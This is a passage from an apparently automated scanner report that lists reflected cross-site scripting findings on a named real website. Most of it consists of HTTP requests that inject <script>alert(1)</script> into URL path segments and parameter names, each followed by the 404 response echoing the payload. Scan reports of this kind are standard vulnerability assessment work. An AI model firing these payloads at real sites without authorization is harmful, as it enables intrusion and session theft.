<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/31e9296<script>alert(1)</script>46c31ef26c8/themes/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.2205. http://www.resellerbase.com/detail/31/themes/kosmos/images/rating/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/31/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 4e7b0<script>alert(1)</script>a3919e4b364 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/31/themes4e7b0<script>alert(1)</script>a3919e4b364/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:01 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/31/themes4e7b0<script>alert(1)</script>a3919e4b364/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.2206. http://www.resellerbase.com/detail/31/themes/kosmos/images/rating/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/31/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 5a578<script>alert(1)</script>c65aa8cc7d2 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/31/themes/kosmos5a578<script>alert(1)</script>c65aa8cc7d2/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:10 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/31/themes/kosmos5a578<script>alert(1)</script>c65aa8cc7d2/images/rating/ was not found on this server.</p>
...[SNIP]...

2.2207. http://www.resellerbase.com/detail/31/themes/kosmos/images/rating/ [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/31/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload bacf4<script>alert(1)</script>6d6060b3a3f was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/31/themes/kosmos/imagesbacf4<script>alert(1)</script>6d6060b3a3f/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:20 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/31/themes/kosmos/imagesbacf4<script>alert(1)</script>6d6060b3a3f/rating/ was not found on this server.</p>
...[SNIP]...

2.2208. http://www.resellerbase.com/detail/31/themes/kosmos/images/rating/ [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/31/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 150bd<script>alert(1)</script>66c5bf9e07d was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/31/themes/kosmos/images/rating150bd<script>alert(1)</script>66c5bf9e07d/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:30 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/31/themes/kosmos/images/rating150bd<script>alert(1)</script>66c5bf9e07d/ was not found on this server.</p>
...[SNIP]...

2.2209. http://www.resellerbase.com/detail/31/themes/kosmos/images/rating/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/31/themes/kosmos/images/rating/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload fa603<script>alert(1)</script>19e84d74849 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/31/themes/kosmos/images/rating/?fa603<script>alert(1)</script>19e84d74849=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:21 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/31/themes/kosmos/images/rating/?fa603<script>alert(1)</script>19e84d74849=1 was not found on this server.</p>
...[SNIP]...

2.2210. http://www.resellerbase.com/detail/31/themes/kosmos/images/rating/4.gif [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/31/themes/kosmos/images/rating/4.gif

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload b9c5f<script>alert(1)</script>408a5dadf9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detailb9c5f<script>alert(1)</script>408a5dadf9/31/themes/kosmos/images/rating/4.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:31:18 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detailb9c5f<script>alert(1)</script>408a5dadf9/31/themes/kosmos/images/rating/4.gif was not found on this server.</p>
...[SNIP]...

2.2211. http://www.resellerbase.com/detail/31/themes/kosmos/images/rating/4.gif [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/31/themes/kosmos/images/rating/4.gif

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 2ed3e<script>alert(1)</script>d627f2f601b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/312ed3e<script>alert(1)</script>d627f2f601b/themes/kosmos/images/rating/4.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:31:34 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/312ed3e<script>alert(1)</script>d627f2f601b/themes/kosmos/images/rating/4.gif was not found on this server.</p>
...[SNIP]...

2.2212. http://www.resellerbase.com/detail/31/themes/kosmos/images/rating/4.gif [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/31/themes/kosmos/images/rating/4.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload e76af<script>alert(1)</script>1e4145b72f7 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/31/themese76af<script>alert(1)</script>1e4145b72f7/kosmos/images/rating/4.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:31:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/31/themese76af<script>alert(1)</script>1e4145b72f7/kosmos/images/rating/4.gif was not found on this server.</p>
...[SNIP]...

2.2213. http://www.resellerbase.com/detail/31/themes/kosmos/images/rating/4.gif [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/31/themes/kosmos/images/rating/4.gif

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 23f83<script>alert(1)</script>883d70be13a was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/31/themes/kosmos23f83<script>alert(1)</script>883d70be13a/images/rating/4.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:32:04 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/31/themes/kosmos23f83<script>alert(1)</script>883d70be13a/images/rating/4.gif was not found on this server.</p>
...[SNIP]...

2.2214. http://www.resellerbase.com/detail/31/themes/kosmos/images/rating/4.gif [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/31/themes/kosmos/images/rating/4.gif

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 55724<script>alert(1)</script>8017fd63531 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/31/themes/kosmos/images55724<script>alert(1)</script>8017fd63531/rating/4.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:32:20 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/31/themes/kosmos/images55724<script>alert(1)</script>8017fd63531/rating/4.gif was not found on this server.</p>
...[SNIP]...

2.2215. http://www.resellerbase.com/detail/31/themes/kosmos/images/rating/4.gif [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/31/themes/kosmos/images/rating/4.gif

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 785e7<script>alert(1)</script>82564b840a0 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/31/themes/kosmos/images/rating785e7<script>alert(1)</script>82564b840a0/4.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:32:39 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/31/themes/kosmos/images/rating785e7<script>alert(1)</script>82564b840a0/4.gif was not found on this server.</p>
...[SNIP]...

2.2216. http://www.resellerbase.com/detail/31/themes/kosmos/images/rating/4.gif [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/31/themes/kosmos/images/rating/4.gif

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 3f697<script>alert(1)</script>9f6ec490a10 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/31/themes/kosmos/images/rating/4.gif3f697<script>alert(1)</script>9f6ec490a10 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:32:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/31/themes/kosmos/images/rating/4.gif3f697<script>alert(1)</script>9f6ec490a10 was not found on this server.</p>
...[SNIP]...

2.2217. http://www.resellerbase.com/detail/31/themes/kosmos/images/rating/4.gif [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/31/themes/kosmos/images/rating/4.gif

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload ad09d<script>alert(1)</script>b2aa14ffbbe was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/31/themes/kosmos/images/rating/4.gif?ad09d<script>alert(1)</script>b2aa14ffbbe=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:30:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/31/themes/kosmos/images/rating/4.gif?ad09d<script>alert(1)</script>b2aa14ffbbe=1 was not found on this server.</p>
...[SNIP]...

2.2218. http://www.resellerbase.com/detail/31/themes/kosmos/images/rating/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/31/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload f2394<script>alert(1)</script>a9cf63e36a2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detailf2394<script>alert(1)</script>a9cf63e36a2/31/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/31/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:42 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detailf2394<script>alert(1)</script>a9cf63e36a2/31/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2219. http://www.resellerbase.com/detail/31/themes/kosmos/images/rating/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/31/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload ce69c<script>alert(1)</script>7cfb51f2ce0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/31ce69c<script>alert(1)</script>7cfb51f2ce0/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/31/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:55 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/31ce69c<script>alert(1)</script>7cfb51f2ce0/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2220. http://www.resellerbase.com/detail/31/themes/kosmos/images/rating/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/31/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload ef61e<script>alert(1)</script>d76e1a4342b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/31/themesef61e<script>alert(1)</script>d76e1a4342b/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/31/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:05 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/31/themesef61e<script>alert(1)</script>d76e1a4342b/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2221. http://www.resellerbase.com/detail/31/themes/kosmos/images/rating/search.php [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/31/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 1ff5d<script>alert(1)</script>d51857a9426 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/31/themes/kosmos1ff5d<script>alert(1)</script>d51857a9426/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/31/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:17 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/31/themes/kosmos1ff5d<script>alert(1)</script>d51857a9426/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2222. http://www.resellerbase.com/detail/31/themes/kosmos/images/rating/search.php [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/31/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload feb69<script>alert(1)</script>0e19d8d9660 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/31/themes/kosmos/imagesfeb69<script>alert(1)</script>0e19d8d9660/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/31/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:27 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/31/themes/kosmos/imagesfeb69<script>alert(1)</script>0e19d8d9660/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2223. http://www.resellerbase.com/detail/31/themes/kosmos/images/rating/search.php [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/31/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload b3853<script>alert(1)</script>9ede5493c6b was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/31/themes/kosmos/images/ratingb3853<script>alert(1)</script>9ede5493c6b/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/31/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
